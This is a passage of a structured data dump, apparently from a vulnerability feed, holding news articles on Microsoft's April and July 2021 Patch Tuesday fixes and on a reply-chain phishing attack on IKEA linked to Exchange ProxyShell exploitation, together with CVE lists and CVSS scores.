include four security fixes for **Microsoft Exchange Server** -- the same systems that have been [besieged by attacks on four separate (and zero-day) bugs in the email software](<https://krebsonsecurity.com/?s=microsoft+exchange+attack>) over the past month. Redmond also patched a Windows flaw that is actively being exploited in the wild.\n\n\n\nNineteen of the vulnerabilities fixed this month earned Microsoft&#x27;s most-dire &quot;Critical&quot; label, meaning they could be used by malware or malcontents to seize remote control over vulnerable Windows systems without any help from users.\n\nMicrosoft released updates to fix four more flaws in Exchange Server versions 2013-2019 ([CVE-2021-28480](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28480>), [CVE-2021-28481](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28481>), [CVE-2021-28482](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28482>), [CVE-2021-28483](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28483>)). Interestingly, all four were reported by the **U.S. National Security Agency**, although Microsoft says it also found two of the bugs internally. A [Microsoft blog post](<https://msrc-blog.microsoft.com/2021/04/13/april-2021-update-tuesday-packages-now-available/>) published along with today&#x27;s patches urges Exchange Server users to make patching their systems a top priority.\n\n**Satnam Narang**, staff research engineer at **Tenable**, said these vulnerabilities have been rated &#x27;Exploitation More Likely&#x27; using Microsoft\u2019s Exploitability Index.\n\n&quot;Two of the four vulnerabilities (CVE-2021-28480, CVE-2021-28481) are pre-authentication, meaning an attacker does not need to authenticate to the vulnerable Exchange server to exploit the flaw,&quot; Narang said. &quot;With the intense interest in Exchange Server since last month, it is crucial that organizations apply these Exchange Server patches immediately.&quot;\n\nAlso patched today was a vulnerability in Windows ([CVE-2021-28310](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28310>)) that&#x27;s being exploited in active attacks already. The flaw allows an attacker to elevate their privileges on a target system.\n\n&quot;This does mean that they will either need to log on to a system or trick a legitimate user into running the code on their behalf,&quot; said **Dustin Childs** of **Trend Micro**. &quot;Considering who is listed as discovering this bug, it is probably being used in malware. Bugs of this nature are typically combined with other bugs, such as browser bug of PDF exploit, to take over a system.&quot;\n\nIn a technical writeup on what they&#x27;ve observed since finding and reporting attacks on CVE-2021-28310, researchers at **Kaspersky Lab** [noted](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>) the exploit they saw was likely used together with other browser exploits to escape &quot;sandbox&quot; protections of the browser.\n\n&quot;Unfortunately, we weren\u2019t able to capture a full chain, so we don\u2019t know if the exploit is used with another browser zero-day, or coupled with known, patched vulnerabilities,&quot; Kaspersky&#x27;s researchers wrote.\n\n**Allan Laska**, senior security architect at **Recorded Future**, notes that there are several remote code execution vulnerabilities in **Microsoft Office** products released this month as well. [CVE-2021-28454](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28454>) and [CVE-2021-28451](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28451>) involve Excel, while [CVE-2021-28453](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28453>) is in **Microsoft Word** and CVE-2021-28449 is in Microsoft Office. All four vulnerabilities are labeled by Microsoft as &quot;Important&quot; (not quite as bad as &quot;Critical&quot;). These vulnerabilities impact all versions of their respective products, including **Office 365**.\n\nOther Microsoft products that got security updates this month include **Edge** (Chromium-based), **Azure** and **Azure DevOps Server**, **SharePoint Server**, **Hyper-V**, **Team Foundation Server**, and **Visual Studio**.\n\nSeparately, **Adobe** has [released security updates](<https://helpx.adobe.com/security.html>) for **Photoshop**, **Digital Editions**, **RoboHelp**, and **Bridge**.\n\nIt\u2019s a good idea for Windows users to get in the habit of updating at least once a month, but for regular users (read: not enterprises) it\u2019s usually safe to wait a few days until after the patches are released, so that Microsoft has time to iron out any kinks in the new armor.\n\nBut before you update, _please_ make sure you have backed up your system and/or important files. It\u2019s not uncommon for a Windows update package to hose one\u2019s system or prevent it from booting properly, and some updates have been known to erase or corrupt files.\n\nSo do yourself a favor and backup before installing any patches. Windows 10 even has some [built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, [see this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-04-13T23:12:19", "type": "krebs", "title": "Microsoft Patch Tuesday, April 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28310", "CVE-2021-28449", "CVE-2021-28451", "CVE-2021-28453", "CVE-2021-28454", "CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483"], "modified": "2021-04-13T23:12:19", "id": "KREBS:F8A52CE066D12F4E4A9E0128831BF48D", "href": "https://krebsonsecurity.com/2021/04/microsoft-patch-tuesday-april-2021-edition/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-07-28T14:33:34", "description": "\n\n**Microsoft** today released updates to patch at least 116 security holes in its **Windows** operating systems and related software. At least four of the vulnerabilities addressed today are under active attack, according to Microsoft.\n\nThirteen of the security bugs quashed in this month&#x27;s release earned Microsoft&#x27;s most-dire &quot;critical&quot; rating, meaning they can be exploited by malware or miscreants to seize remote control over a vulnerable system without any help from users.\n\nAnother 103 of the security holes patched this month were flagged as &quot;important,&quot; which Microsoft assigns to vulnerabilities &quot;whose exploitation could result in compromise of the confidentiality, integrity, or availability of user data, or of the integrity or availability of processing resources.&quot;\n\nAmong the critical bugs is of course the official fix for the **PrintNightmare** print spooler flaw in most versions of Windows ([CVE-2021-34527](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34527>)) that prompted Microsoft [to rush out a patch for a week ago](<https://krebsonsecurity.com/2021/07/microsoft-issues-emergency-patch-for-windows-flaw/>) in response to exploit code for the flaw that got accidentally published online. That patch seems to have caused a number of problems for Windows users. Here&#x27;s hoping the updated fix resolves some of those issues for readers who&#x27;ve been holding out.\n\n[CVE-2021-34448](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34448>) is a critical remote code execution vulnerability in the scripting engine built into every supported version of Windows -- including server versions. Microsoft says this flaw is being exploited in the wild.\n\nBoth [CVE-2021-33771](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-33771>) and [CVE-2021-31979](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31979>) are elevation of privilege flaws in the Windows kernel. Both are seeing active exploitation, according to Microsoft.\n\n**Chad McNaughton**, technical community manager at **Automox**, called attention to [CVE-2021-34458](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34458>), a remote code execution flaw in the deepest areas of the operating system. McNaughton said this vulnerability is likely to be exploited because it is a &quot;low-complexity vulnerability requiring low privileges and no user interaction.&quot;\n\nAnother concerning critical vulnerability in the July batch is [CVE-2021-34494](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34494>), a dangerous bug in the Windows DNS Server.\n\n&quot;Both core and full installations are affected back to Windows Server 2008, including versions 2004 and 20H2,&quot; said **Aleks Haugom**, also with Automox.\n\n&quot;DNS is used to translate IP addresses to more human-friendly names, so you don\u2019t have to remember the jumble of numbers that represents your favorite social media site,&quot; Haugom said. &quot;In a Windows Domain environment, Windows DNS Server is critical to business operations and often installed on the domain controller. This vulnerability could be particularly dangerous if not patched promptly.&quot;\n\nMicrosoft also patched six vulnerabilities in **Exchange Server**, an email product that has been under siege all year from attackers. **Satnam Narang**, staff research engineer at **Tenable**, noted that while Microsoft says two of the Exchange bugs tackled this month ([CVE-2021-34473](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34473>) and [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-34523>)) were addressed as part of its security updates from April 2021, both CVEs were somehow omitted from that April release. Translation: If you already applied the bevy of Exchange updates Microsoft made available in April, your Exchange systems have protection against these flaws.\n\nOther products that got patches today include **Microsoft Office**, **Bing**, **SharePoint Server**, **Internet Explorer**, and **Visual Studio**. The **SANS Internet Storm Center** as always has [a nice visual breakdown of all the patches by severity](<https://isc.sans.org/forums/diary/Microsoft+July+2021+Patch+Tuesday/27628/>).\n\n**Adobe** also [issued security updates today](<https://helpx.adobe.com/security.html>) for **Adobe Acrobat** and **Reader**, as well as **Dimension**, **Illustrator**, Framemaker and Adobe Bridge.\n\n**Chrome** and **Firefox** also recently have shipped important security updates, so if you haven&#x27;t done so recently take a moment to save your tabs/work, completely close out and restart the browser, which should apply any pending updates.\n\nThe usual disclaimer:\n\nBefore you update with this month\u2019s patch batch, please make sure you have backed up your system and/or important files. It\u2019s not uncommon for Windows updates to hose one\u2019s system or prevent it from booting properly, and some updates even have been known to erase or corrupt files.\n\nSo do yourself a favor and backup _before_ installing any patches. Windows 10 even has [some built-in tools](<https://lifehacker.com/how-to-back-up-your-computer-automatically-with-windows-1762867473>) to help you do that, either on a per-file/folder basis or by making a complete and bootable copy of your hard drive all at once.\n\nAnd if you wish to ensure Windows has been set to pause updating so you can back up your files and/or system before the operating system decides to reboot and install patches on its own schedule, see [this guide](<https://www.computerworld.com/article/3543189/check-to-make-sure-you-have-windows-updates-paused.html>).\n\nAs always, if you experience glitches or problems installing any of these patches this month, please consider leaving a comment about it below; there\u2019s a better-than-even chance other readers have experienced the same and may chime in here with some helpful tips. Also, check out [AskWoody](<https://www.askwoody.com/>), which keeps a close eye out for specific patches that may be causing problems for users.", "cvss3": {"exploitabilityScore": 3.1, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.9, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-13T21:41:47", "type": "krebs", "title": "Microsoft Patch Tuesday, July 2021 Edition", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-34494", "CVE-2021-34473", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34523", "CVE-2021-34458", "CVE-2021-34527", "CVE-2021-31979"], "modified": "2021-07-13T21:41:47", "id": "KREBS:831FD0B726B800B2995A68BA50BD8BE3", "href": "https://krebsonsecurity.com/2021/07/microsoft-patch-tuesday-july-2021-edition/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2021-04-15T09:53:55", "description": "Microsoft had its hands full Tuesday snuffing out five zero-day vulnerabilities, a flaw under active attack and applying more patches to its [problem-plagued Microsoft Exchange Server software](<https://threatpost.com/microsoft-exchange-outlook-apts/160273/>).\n\nIn all, Microsoft released patches for 110 security holes, 19 classified critical in severity and 88 considered important. The most dire of those flaws disclosed is arguably a Win32k elevation of privilege vulnerability ([CVE-2021-28310](<http://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28310>)) actively being exploited in the wild by the cybercriminal group BITTER APT.[](<https://threatpost.com/newsletter-sign/>)\n\n## **Actively Exploited Zero-Day **\n\n\u201cWe believe this exploit is used in the wild, potentially by several threat actors. It is an escalation of privilege (EoP) exploit that is likely used together with other browser exploits to escape sandboxes or get system privileges for further access,\u201d wrote Kaspersky in [a Tuesday report](<https://securelist.com/zero-day-vulnerability-in-desktop-window-manager-cve-2021-28310-used-in-the-wild/101898/>) detailing its find.\n\nThe bug is an out-of-bounds write vulnerability in Windows dwmcore.dll library, which is part of Desktop Window Manager (dwm.exe). \u201cDue to the lack of bounds checking, attackers are able to create a situation that allows them to write controlled data at a controlled offset using DirectComposition API,\u201d wrote Kaspersky researchers Boris Larin, Costin Raiu and Brian Bartholomew, co-authors of the report.\n\n## **More Bugs Tied to Plagued Exchange**\n\nOf note, the U.S. National Security Agency released information on four critical Exchange Server vulnerabilities ([CVE-2021-28480](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28480>), [CVE-2021-28481](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28481>), [CVE-2021-28482](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28482>), [CVE-2021-28483](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28483>)) impacting versions released between 2013 and 2019.\n\n\u201cThese vulnerabilities have been rated \u2018exploitation more likely\u2019 using Microsoft\u2019s Exploitability Index. Two of the four vulnerabilities (CVE-2021-28480, CVE-2021-28481) are pre-authentication, meaning an attacker does not need to authenticate to the vulnerable Exchange server to exploit the flaw. With the intense interest in Exchange Server since last month, it is crucial that organizations apply these Exchange Server patches immediately,\u201d wrote Satnam Narang, staff research engineer with Tenable in commentary shared with Threatpost.\n\nMicrosoft notes that two of the four Exchange bugs reported by the NSA were also found internally by its own research team.\n\n## **[](<https://media.threatpost.com/wp-content/uploads/sites/103/2020/09/25150114/Bug-Bounty-Code_small.jpg>)Bugs, Bugs and More Bugs**\n\nMicrosoft also included patches for its Chromium-based Edge web browser, Azure and Azure DevOps Server, Microsoft Office, SharePoint Server, Hyper-V, Team Foundation Server and Visual Studio.\n\n\u201cApril\u2019s Patch Tuesday yields\u2026 [are] the highest monthly total for 2021 (so far) and showing a return to the 100-plus totals we consistently saw in 2020,\u201d wrote Justin Knapp, senior product marketing manager with Automox, in a prepared analysis shared with Threatpost. \u201cThis month\u2019s haul includes 19 critical vulnerabilities and a high-severity zero-day that is actively being exploited in the wild.\u201d\n\nHe added, \u201cWe\u2019re also seeing multiple browser-related vulnerabilities this month that should be addressed immediately. This represents an overall upward trend that\u2019s expected to continue throughout the year and draw greater urgency around patching velocity, to ensure organizations are not taking on unnecessary exposure \u2014 especially given the increased exploitation of known, dated vulnerabilities.\u201d\n\nInterestingly, Knapp pointed out patching best practices were vitally important to companies as they are challenged by a workforce that is still largely remote and forced to socially distance because of the COVID-19 pandemic.\n\n\u201cWith the dramatic shift to remote work in 2020 now becoming a permanent fixture in 2021, it\u2019s also worth noting the significance of employing measures that can immediately push newly released security updates across a more decentralized, diverse set of assets and environments,\u201d he said.\n\n## **Office Remote Code-Execution Bugs**\n\nTroublesome given the ubiquitous nature of the Microsoft Office are four remote code execution (RCE) vulnerabilities patched this month within the productivity suite. Microsoft Word ([CVE-2021-28453](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28453>)) and Excel ([CVE-2021-28454](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28454>), [CVE-2021-28451](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28451>)) are impacted, and a fourth bug ([CVE-2021-28449](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-28449>)) is only listed as effecting Microsoft Office. The updates are rated \u201cimportant\u201d and, according to Microsoft, impact all versions of Office including Office 365.\n\nJay Goodman, manager of product marketing at Automox, noted in his Patch Tuesday commentary that Microsoft\u2019s security holes this month include a number of flaws identified as remote procedure call (RPC) runtime RCE bugs.\n\n\u201cRPC is a protocol used to request a service from a program that is located on another computer or device on the same network,\u201d he explained. \u201cThe vulnerabilities allow for remote code execution on the target system. The vulnerability may be exploited by sending a specially crafted RPC request. Depending on the user privileges, an attacker could install programs, change or delete data, or create additional user accounts with full user rights.\u201d\n\nMicrosoft marks the vulnerability type as \u201cexploitation less likely,\u201d however, it\u2019s highly recommended to quickly patch and remediate any RCE vulnerabilities on systems, Goodman said: \u201cLeaving latent vulnerabilities with RCE exploits can easily lead to a faster-spreading attack.\u201d\n\nMicrosoft\u2019s April Patch Tuesday update was complemented by Adobe\u2019s monthly slew of patches, which addressed [10 security bugs](<https://threatpost.com/adobe-patches-critical-security-holes-bridge-photoshop/165371/>), seven of them critical.\n\n**_Ever wonder what goes on in underground cybercrime forums? Find out on April 21 at 2 p.m. ET during a _****_[FREE Threatpost event](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_, \u201cUnderground Markets: A Tour of the Dark Economy.\u201d Experts will take you on a guided tour of the Dark Web, including what\u2019s for sale, how much it costs, how hackers work together and the latest tools available for hackers. _****_[Register here](<https://threatpost.com/webinars/underground-markets-a-tour-of-the-dark-economy/?utm_source=ART&utm_medium=ART&utm_campaign=April_webinar>)_****_ for the Wed., April 21 LIVE event. _**\n", "cvss3": {}, "published": "2021-04-14T12:46:33", "type": "threatpost", "title": "Microsoft Has Busy April Patch Tuesday with Zero-Days, Exchange Fixes", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-28310", "CVE-2021-28449", "CVE-2021-28451", "CVE-2021-28453", "CVE-2021-28454", "CVE-2021-28480", "CVE-2021-28481", "CVE-2021-28482", "CVE-2021-28483"], "modified": "2021-04-14T12:46:33", "id": "THREATPOST:9235CC6F1DCCA01B571B8693E5F7B880", "href": "https://threatpost.com/microsoft-april-patch-tuesday-zero-days/165393/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-30T15:47:49", "description": "As of Friday \u2013 as in, shopping-on-steroids Black Friday \u2013 retail titan IKEA was wrestling with a then-ongoing reply-chain email phishing attack in which attackers were malspamming replies to stolen email threads.\n\n[BleepingComputer](<https://www.bleepingcomputer.com/news/security/ikea-email-systems-hit-by-ongoing-cyberattack/>) got a look at internal emails \u2013 one of which is replicated below \u2013 that warned employees of the attack, which was targeting the company\u2019s internal email inboxes. The phishing emails were coming from internal IKEA email addresses, as well as from the systems compromised at the company\u2019s suppliers and partners.\n\n> \u201cThere is an ongoing cyberattack that is targeting Inter IKEA mailboxes. Other IKEA organisations, suppliers, and business partners are compromised by the same attack and are further spreading malicious emails to persons in Inter IKEA.\n> \n> \u201cThis means that the attack can come via email from someone that you work with, from any external organisation, and as reply to an already ongoing conversation. It is therefore difficult to detect, for which we ask you to be extra cautious.\u201d \u2013IKEA internal email to employees.\n\nAs of Tuesday morning, the company hadn\u2019t seen any evidence of its customers\u2019 data, or business partners\u2019 data, having been compromised. \u201cWe continue to monitor to ensure that our internal defence mechanisms are sufficient,\u201d the spokesperson said, adding that \u201cActions have been taken to prevent damages\u201d and that \u201ca full-scale investigation is ongoing.\u201d____\n\nThe spokesperson said that the company\u2019s \u201chighest priority\u201d is that \u201cIKEA customers, co-workers and business partners feel certain that their data is secured and handled correctly.\u201d\n\nIKEA didn\u2019t respond to Threatpost\u2019s queries about whether the attack has been contained or if it\u2019s still ongoing.\n\n## Example Phishing Email\n\nIKEA sent its employees an example phishing email, shown below, that was received in Microsoft Outlook. The company\u2019s IT teams reportedly pointed out that the reply-chain emails contain links ending with seven digits. Employees were warned against opening the emails, regardless of who sent them, and were asked to immediately report the phishing emails to the IT department if they receive them.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/29144159/phishing-email-e1638214934826.jpeg>)\n\nExample phishing email sent to IKEA employees. Source: BleepingComputer.\n\n## Exchange Server Attacks D\u00e9j\u00e0 Vu?\n\nThe attack sounds familiar: Earlier this month, Trend Micro published a [report](<https://www.trendmicro.com/en_us/research/21/k/Squirrelwaffle-Exploits-ProxyShell-and-ProxyLogon-to-Hijack-Email-Chains.html>) about attackers who were doing the same thing with replies to hijacked email threads. The attackers were gnawing on the ProxyLogon and ProxyShell vulnerabilities in Microsoft Exchange Server to hijack email chains, by malspamming replies to ongoing email threads and hence boosting the chance that their targets would click on malicious links that lead to malware infection.\n\n[](<https://threatpost.com/infosec-insider-subscription-page/?utm_source=ART&utm_medium=ART&utm_campaign=InfosecInsiders_Newsletter_Promo/>)\n\nAs security experts have noted, hijacking email replies for malspam campaigns is a good way to slip past people\u2019s spam suspicions and to avoid getting flagged or quarantined by email gateways.\n\nWhat was still under discussion at the time of the Trend Micro report: Whether the offensive was delivering SquirrelWaffle, the new email loader that [showed up](<https://threatpost.com/squirrelwaffle-loader-malspams-packing-qakbot-cobalt-strike/175775/>) in September, or whether SquirrelWaffle was just one piece of malware among several that the campaigns were dropping.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\nCisco Talos researchers first [got wind](<https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+feedburner%2FTalos+%28Talos%E2%84%A2+Blog%29>) of the SquirrelWaffle malspam campaigns beginning in mid-September, when they saw boobytrapped Microsoft Office documents delivering [Qakbot malware](<https://threatpost.com/prolock-ransomware-qakbot-trojan/155828/>) and the penetration-testing tool [Cobalt Strike](<https://threatpost.com/cobalt-strike-cybercrooks/167368/>) \u2013 two of the most common threats regularly observed targeting organizations around the world. The Office documents infected systems with SquirrelWaffle in the initial stage of the infection chain.\n\nSquirrelWaffle campaigns are known for using stolen email threads to increase the chances that a victim will click on malicious links. Those rigged links are tucked into an email reply, similar to how the virulent [Emotet](<https://threatpost.com/emotet-takedown-infrastructure-netwalker-offline/163389/>) malware \u2013 typically spread via malicious emails or text messages \u2013 has been known to work.\n\nTrend Micro\u2019s incident-response team had decided to look into what its researchers believed were SquirrelWaffle-related intrusions in the Middle East, to figure out whether the attacks involved the notorious, [oft-picked-apart](<https://threatpost.com/microsoft-exchange-servers-proxylogon-patching/165001/>) [ProxyLogon](<https://threatpost.com/deadringer-targeted-exchange-servers-before-discovery/168300/>) and [ProxyShell](<https://threatpost.com/exchange-servers-attack-proxyshell/168661/>) Exchange server vulnerabilities.\n\nTheir conclusion: Yes, the intrusions were linked to ProxyLogon and ProxyShell attacks on unpatched Exchange servers, as evidenced by the IIS logs of three compromised servers, each compromised in a separate intrusion, all having been exploited via the ProxyShell and ProxyLogon vulnerabilities [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>), [CVE-2021-34473](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473>) and [CVE-2021-34523](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34523>).\n\nIn the Middle East campaign that Trend Micro analyzed, the phishing emails contained a malicious Microsoft Excel doc that did [what malicious Excel documents do](<https://threatpost.com/hackers-update-age-old-excel-4-0-macro-attack/154898/>): It prompted targets to choose \u201cEnable Content\u201d to view a protected file, thus launching the infection chain.\n\nSince IKEA hasn\u2019t responded to media inquiries, it\u2019s impossible to say for sure whether or not it has suffered a similar attack. However, there are yet more similarities between the IKEA attack and the Middle East attack analyzed by Trend Micro earlier this month. Specifically, as BleepingComputer reported, the IKEA reply-email attack is likewise deploying a malicious Excel document that similarly instructs recipients to \u201cEnable Content\u201d or \u201cEnable Editing\u201d to view it.\n\nTrend Micro shared a screen capture, shown below, of how the malicious Excel document looked in the Middle East campaign:\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2021/11/22122626/Malicious-Microsoft-Excel-document--e1637602000585.png>)\n\nMalicious Microsoft Excel document. Source: Trend Micro.\n\n## You Can\u2019t Trust Email from \u2018Someone You Know\u2019\n\nIt\u2019s easy to mistake the malicious replies as coming from legitimate senders, given that they pop up in ongoing email threads. Saryu Nayyar, CEO of Gurucul, noted that IKEA employees are learning the hard way that replies in threads aren\u2019t necessarily legitimate and can be downright malicious.\n\n\u201cIf you get an email from someone you know, or that seems to continue an ongoing conversation, you are probably inclined to treat it as legitimate,\u201d she told Threatpost via email on Monday. \u201cHowever, IKEA employees are finding out otherwise. They are being attacked by phishing emails that are often purportedly from known sources, and may be carrying the Emotet or Qbot trojans to further infect the system and network.\u201d\n\nThis attack is \u201cparticularly insidious,\u201d she commented, in that it \u201cseemingly continues a pattern of normal use.\u201d\n\n## No More Ignoring Quarantine\n\nWith such \u201cnormal use\u201d patterns lulling would-be victims into letting down their guards, it raises the possibility that employees might assume that email filters were mistaken if they quarantined the messages.\n\nThus, IKEA\u2019s internal email advised employees that its IT department was disabling the ability to release emails from quarantine. As it is, its email filters were identifying at least some of the malicious emails:\n\n> \u201cOur email filters can identify some of the malicious emails and quarantine them. Due to that the email could be a reply to an ongoing conversation, it\u2019s easy to think that the email filter made a mistake and release the email from quarantine. We are therefore until further notice disabling the possibility for everyone to release emails from quarantine.\u201d \u2013IKEA internal email to employees.\n\n## Is Training a Waste of Time?\n\nWith such sneaky attacks as these, is training pointless? Some say yes, some say no.\n\nErich Kron, security awareness advocate at [KnowBe4](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUavSzE-2FiwjSkZ-2BMZMLjTD68bBzltWsjOj4iPYBhQEjDkwmuP_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74JadqFiCZdgYU0Y0aYb-2FD61SsSN5WSYToKPBxI2VArzhMwftrf78GbiRjwM9LzhmNBFfpMuXBsqYiKB-2B-2F-2BBM3106r2sgW-2Be451MnVYlMzEVQ43u-2Fx2JCoSpeITOcIPo6Gi3VBNSVcUaapZzArkSDh5SZ2Cih-2F-2FVdRBgHXCsqyWXs7po0-2FS83TsiYRB3U8HOgtt0HT6BGdSMjxi-2FVc6P1ZgVny6ZGKAKxbHvydLCfU5zrtFQ-3D>), is pro-training, particularly given how damaging these attacks can be.\n\n\u201cCompromised email accounts, especially those from internal email systems with access to an organization\u2019s contact lists, can be very damaging, as internal emails are considered trusted and lack the obvious signs of phishing that we are used to looking for,\u201d he told Threatpost via email on Monday. \u201cBecause it is from a legitimate account, and because cybercriminals often inject themselves into previous legitimate conversations, these can be very difficult to spot, making them very effective.\n\n\u201cThese sorts of attacks, especially if the attackers can gain access to an executive\u2019s email account, can be used to spread ransomware and other malware or to request wire transfers to cybercriminal-owned bank accounts, among other things,\u201d Kron said.\n\nHe suggested training employees not to blindly trust emails from an internal source, but to hover over links and to consider the context of the message. \u201cIf it does not make sense or seems unusual at all, it is much better to pick up the phone and quickly confirm the message with the sender, rather than to risk a malware infection or falling victim to a scam,\u201d he said.\u201d\n\nIn contrast, Christian Espinosa, managing director of [Cerberus Sentinel](<https://u7061146.ct.sendgrid.net/ls/click?upn=4tNED-2FM8iDZJQyQ53jATUc1h7F6EeKyqQHDAzxY6FeBG4AZ1lNaZ-2Fme9HKLAKT7PeL3x_q07lK5GAAVvAnbc-2Fr-2FBDhAPhoMvwzp-2Bdh4wgfTcF0AUhu01ZMXdKNJrsN0iCyDU7ehW0N22Ype9yCK1TM6XYzZcULka2hXrkxot-2FYcsNMOW-2Fi7ZSbc4BW4Y4w5w74JadqFiCZdgYU0Y0aYb-2FD61SsSN5WSYToKPBxI2VArzhMwftrf78GbiRjwM9LzhmNBFfpMuXBsqYiKB-2B-2F-2BBM3106r8Wex0T7OFTT8vFIbMA9T-2BlDgGhDFXEelC-2FWPjZXKe9NWtbBbYafHTvkVre5k1vKi3GgofOJKSR-2F2xlpyW7kQklpPEA59unEm4rAKnCodaK-2FrXGwLA5yk9gY1MBMzuyaJeG4mVY1yL-2F3YI1d-2BMmcWiY-3D>), is a firm vote for the \u201ctraining is pointless\u201d approach.\n\n\u201cIt should be evident by now that awareness and phishing training is ineffective,\u201d he told Threatpost via email on Monday. \u201cIt\u2019s time we accept \u2018users\u2019 will continuously fall for phishing scams, despite how much \u2018awareness training\u2019 we put them through.\u201d\n\nBut what options do we have? Espinosa suggested that cybersecurity defense playbooks \u201cshould focus on items that reduce risk, such as application whitelisting, which would have stopped this attack, as the \u2018malware\u2019 would not be whitelisted.\u201d\n\nHe pointed to other industries that have compensated for human factors, such as transportation. \u201cDespit